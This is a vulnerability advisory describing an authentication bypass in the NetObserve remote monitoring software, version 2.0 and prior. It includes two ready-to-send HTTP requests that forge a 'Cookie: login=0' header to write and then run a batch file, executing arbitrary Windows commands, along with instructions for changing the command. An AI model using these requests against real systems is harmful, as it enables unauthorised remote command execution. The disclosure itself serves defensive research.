NetObserve Security Bypass Vulnerability ######################################## Credit: Author : Peter Winter-Smith Software: Packages : NetObserve Version : 2.0 and prior Vendor : ExploreAnywhere Software Vendor Url : http://www.exploreanywhere.com/no-intro.php Vulnerability: Bug Type : Security Bypass Severity : Highly Critical + Remote System Command Via NetObserve 1. Description of Software "NETObserve is your all in one solution to monitoring spouses, co-workers, children, employee's and just about any other person you may concerned of that is using your PC! NETObserve will monitor not only what is going on within your PC, but it can also record what is going on in front of your PC, through the use of our breakthrough web cam surveillance technology! With NETObserve on your side, you will have remote, realtime access to your PC, allowing you to remotely control and monitor a PC while you are away! Read on to find out why NETObserve is leading the way in the cutting edge industry of PC monitoring, surveillance, and administration!" - Vendor's Description 2. Bug Information (a). Security Bypass NetObserve is extremely persistant when trying to ensure that any remote user issuing commands to the server is properly authenticated. It seems that even if the remote administrator closes his or her browser they are required to login again before they can gain control of the remote system. Once a legitimate session with an administrator has been established, the browser confirms that the commands which the remote user is issuing are allowed to be performed on the remote system by sending a special HTTP header to the NetObserve server. The only problem with this is the fact that any remote user can attach the special header directly to their own specially crafted request, and NetObserve blindly believes that a session with an administrator was already in progress. The special header in question is nothing more than 'Cookie: login=0'! 3. Proof of Concept Code The following two HTTP requests will execute commands via the windows command interpreter on the remote system: REQUEST #1: -------------------------------------------------------------------------- POST /sendeditfile HTTP/1.1 Accept: */* Referer: http://127.0.0.1/editfile=?C:\WINDOWS\win.bat? Content-Type: application/x-www-form-urlencoded Host: AnyHostWillDo Content-Length: 25 Cookie: login=0 newfiledata=cmd+%2Fc+calc -------------------------------------------------------------------------- REQUEST #2: -------------------------------------------------------------------------- GET /runfile=?C:\windows\win.bat? HTTP/1.1 Accept: */* Host: AnyHostWillDo Cookie: login=0 -------------------------------------------------------------------------- To change the commands to be run, just alter the 'Content-Length' of the first request to be the length of the line of commands, including the string 'newfiledata='. Then alter the data being posted under 'newfiledata', remembering to replace spaces with '+' and encode any common HTTP characters, like '/' as hexadecimal values, '%2F' in this instance. These specific requests sent unaltered will execute the windows calculator. 4. Patches - Workarounds No fixes are available at the time of writing. It it suggested that you use a different, more secure remote administration software package until a patch is released. 5. Credits The discovery, analysis and exploitation of this flaw is a result of research carried out by Peter Winter-Smith. I would ask that you do not regard any of the analysis to be 'set in stone', and that if investigating this flaw you back trace the steps detailed earlier for yourself. Greets and thanks to: David and Mark Litchfield, JJ Gray (Nexus), Todd and all the packetstorm crew, Luigi Auriemma, Bahaa Naamneh, sean(gilbert(perlboy)), pv8man, nick k., Joel J. and Martine. o This document should be mirrored at: - http://www.elitehaven.net/netobserve.txt